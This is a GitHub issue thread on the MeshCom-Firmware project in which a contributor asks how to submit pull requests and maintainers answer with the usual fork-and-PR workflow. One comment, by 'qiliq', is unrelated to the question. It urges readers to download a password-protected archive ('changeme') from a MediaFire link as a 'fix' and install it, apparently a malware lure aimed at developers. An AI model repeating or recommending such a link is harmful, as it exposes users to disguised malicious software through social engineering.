### ISSUE TITLE
How to contribute

### ISSUE THREAD

**Issue by ok1cdj** [icssw-org/MeshCom-Firmware#45]
Hello all, i would like to repair some bugs regarding different boards which i have. Is there some guide how to create pull requests ?
For example one/bug feature one pull request or it all together ?

Regards, Ondra OK1CDJ

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rainerfritz** [comment]
Hi Ondra!

One bug and one pull request sounds fine!
The rest is the usual way -> Fork -> make changes or additions to the code -> create pull request.

BR
Rainer

**Comment by ok1cdj** [comment]
Ok will make PR.

**Comment by oe1kbc** [comment]
Hi Ondra,

i’ve pushed our latest updates (Version 4.33e) to the main branch. Please refer to this branch for your next requests.

 

Thank you for your help

 

73 de Kurt

OE1KBC

 

Ing. Kurt Baumann
T: +43 699 1200 3520
M:  ***@***.***> ***@***.***
H:  <https://icssw.org> https://icssw.org

 

Von: Ondrej Kolonicny ***@***.***> 
Gesendet: Mittwoch, 28. August 2024 09:45
An: icssw-org/MeshCom-Firmware ***@***.***>
Cc: Subscribed ***@***.***>
Betreff: [icssw-org/MeshCom-Firmware] How to contribute (Issue #45)

 

Hello all, i would like to repair some bugs regarding different boards which i have. Is there some guide how to create pull requests ?
For example one/bug feature one pull request or it all together ?

Regards, Ondra OK1CDJ
